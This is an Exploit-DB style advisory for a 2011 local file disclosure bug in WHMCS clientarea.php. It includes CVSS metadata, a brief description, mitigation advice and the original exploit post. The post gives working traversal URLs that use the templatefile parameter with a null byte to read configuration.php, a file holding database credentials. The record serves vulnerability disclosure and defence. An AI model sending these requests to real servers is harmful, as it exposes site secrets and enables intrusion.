WHMCS (clientarea.php) Local File Disclosure

vendor:

WHMCompleteSolution

by:

Red Virus

7.5

CVSS

HIGH

Local File Disclosure

CWE

Product Name: WHMCompleteSolution

Affected Version From: 3.X.x

Affected Version To: 3.X.x

Patch Exists: NO

Related CWE: N/A

CPE: a:whmcs:whmcs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux+Apache

2011

WHMCS (clientarea.php) Local File Disclosure

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server with a wrong value in the action parameter and a malicious file path in the templatefile parameter. This will allow the attacker to view the contents of the file specified in the templatefile parameter.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input and sanitizing it before processing.

Source

Exploit-DB raw data:

# Title      : WHMCS (clientarea.php) Local File Disclosure

# Author     : Red Virus >>>c3o@w.cn

# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 11/04/2011
# Version    : 3.X.x
# Tested on  : linux+apache
# Homepage   : www.alm3refh.com 
================================================================

 
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
 
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
 
show the page source to see Disclosure file
 

================================================================

Greetz To .
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 
infofst & virus hima & Karar aLShaMi  & all alm3refh group
ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA